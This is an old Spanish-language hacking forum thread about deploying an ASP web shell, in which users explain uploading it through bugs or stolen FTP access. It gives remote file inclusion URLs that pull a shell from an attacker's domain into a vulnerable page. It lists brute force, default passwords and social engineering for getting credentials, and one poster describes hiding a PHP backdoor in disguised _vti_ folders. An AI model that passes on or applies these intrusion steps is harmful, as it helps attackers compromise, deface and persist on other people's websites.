Mi Primer ASP Shell

Morris · 14 Julio 2006, 04:06 AM

Lo cipias, lo pegas en el notepad, lo guardas con extensión asp.

Para subirlo a alguna web necesitas utilizar algún bug o subirlo por ftp (necesitas un password o un bug)

Luego entras vía http y lo ejecutas por internet explorer.

track1 · 14 Julio 2006, 17:35 PM

Hola, esto es lo que no entiendo: Luego entras vía http y lo ejecutas por internet explorer.
Pero como? Por ejemplo ya tengo una web con el bug pagina=http://www.foro.elhacker.net , entonces para aprovechar el bug quedaria algo asi: http://www.xxxxx.com/index.asp?pais=xxx&pagina=http://www.foro.elhacker.net
entonces si colocora el codigo de la shell en la web del foro tendria que agregarle la ubicacion de la shell y quedaria algo como esto: http://www.xxxxx.com/index.asp?pais=xxx&pagina=http://www.foro.elhacker.net/myshell.asp
Estoy en lo correcto???

whaky · 15 Julio 2006, 00:28 AM

www.paginavulnerable.com/index.asp?pais=xxx&pagina=http://www.tudominiocontushell.com/shell.asp

asi quedaria

track1 · 15 Julio 2006, 03:36 AM

Gracias Whaky, ahora solo no entiendo como podria hacer una cuenta ftp y poderla usar para tener ahi la shell, me refiero a que las cuentas ftp piden user y pass y no entiendo como podria hacer.
Me refiero que al link que se le agrega a la web vulnerable es por ejemplo asi: ftp://ftp.web.com pero cuando se quiera acceder ahi va a pedir el loggin. Como se haria??

Morris · 18 Julio 2006, 05:22 AM

Fuerza bruta.
Password default.
Bug en FTP
Robando el user y pwd mediante ingeniería social.
Con algún bug de upload que te permita subir archivos a la web.

Man-In-the-Middle · 18 Julio 2006, 18:22 PM

Muy curro, Morris, como el que me pasastes hace un tiempo, el tema para que sirve, pues te curras, una web, te camuflas por ahi, por temp, que se io y tienes un back

ejemplo
http://www.fgfggfg.com/_vti_tmp/_vti_log/_vti_txt/_vti_root/xxxxfacer.php

este era en php, pues me cree _vti_tmp/_vti_log/_vti_txt/_vti_root, para esconderlo bien y wuallaaa , por lo menos un año para encontrarme , Thnks Morris

Off Topic/ OLD TOPIC!!

AdReNaLiNe · 2 Agosto 2006, 13:00 PM

eso del ftp....tp lo entiendo yo

...como lo hago, me creo una cuenta ftp por ejemplo en "miarroba" y subo a "mi pagina web" ese codigo en .asp a traves de ftp o como sea no? la cuestion es tener subido en mi pagina ese codigo para poder usarlo, ahora pongo la direccion de mi pagina de forma k abra el .asp
"www.mipagina.com/codigo.asp" y asi se abriria el codigo en la shell no???

se supone k ese codigo es un xploit (corriganme por favor si me ekivoco) y k introduciendolo en otro codigo web pues me metere como administrador y podre hacer lo k kiera en la web, para hacer tal cosa tendria k poner:

www.paginaahacker.com/index.asp?pais=xxx&pagina=http://www.mipagina.com/codigo.asp

se supone k si sale bien y ese xploit es asi como se usa (k nose mucho de exploits...nose de k tipo es este ni nada

) me meteria directamente en la web como administrador???

hackpsycho · 2 Agosto 2006, 18:23 PM

bueno yo tambien tengo una dudita, el ASP, ya lo subi, a un ftp

http://psychito.webcindario.com/index.asp

ese es estoy en lo correcto como lo ise??

Ahora como lo ago funcionar, o que ondas

sirdarckcat · 3 Agosto 2006, 04:32 AM

investiga sobre bugs de RFI.. y su explotacion.

Saludos!!

AdReNaLiNe · 3 Agosto 2006, 15:12 PM

Todo lo k sea defacears webs...son metodos RFI?? (sql, etc...)

Creo k esta pregunta podria llegar al grado de estupida...pero esk necesito aclarar esa idea